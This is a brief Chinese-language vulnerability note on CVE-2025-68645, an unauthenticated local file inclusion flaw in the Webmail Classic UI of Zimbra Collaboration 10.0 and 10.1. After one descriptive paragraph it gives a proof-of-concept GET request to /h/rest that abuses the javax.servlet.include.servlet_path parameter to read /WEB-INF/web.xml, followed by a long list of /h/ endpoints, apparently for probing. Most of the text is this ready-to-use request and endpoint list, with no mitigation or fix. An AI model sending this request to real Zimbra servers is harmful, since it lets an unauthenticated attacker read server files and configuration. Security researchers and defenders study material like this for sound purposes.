漏洞描述
Zimbra Collaboration (ZCS) 10.0 和 10.1 版本的 Webmail Classic UI 中存在本地文件包含漏洞(LFI),由于 RestFilter Servlet 在处理用户请求参数时缺乏有效校验,未认证的远程攻击者可向 /h/rest 接口构造恶意请求,影响内部请求分发流程,从而包含并读取 WebRoot 目录下的任意文件。
Zimbra Collaboration Suite /h javax.servlet.include.path_info 文件包含漏洞(CVE-2025-68645)
PoC代码
GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1
Host:
/h/ac
/h/addattendees
/h/addcontacts
/h/addcontactconfirmation
/h/addgroupcontact
/h/ads
/h/attachments
/h/calendar
/h/changepass
/h/checkspelling
/h/compose
/h/eappt
/h/econtact
/h/egroup
/h/etask
/h/grpcontacts
/h/task
/h/home
/h/homevoice
/h/imessage
/h/login
/h/maddrbooks
/h/mcalendars
/h/message
/h/mfolders
/h/mtags
/h/mtasks
/h/options
/h/postLoginRedirect
/h/printcalls
/h/printcalendar
/h/printvoicemails
/h/printappointments
/h/repeat
/h/rest
/h/search
/h/test
/h/upsell
/h/voicemail
/h/overviewAds
/h/sidebarads
/h/printcontacts
/h/printconversations
/h/printmessage
/h/printtasks
/h/briefcaseupload
/h/mbriefcases
/h/viewimages
/h/autoSaveDraft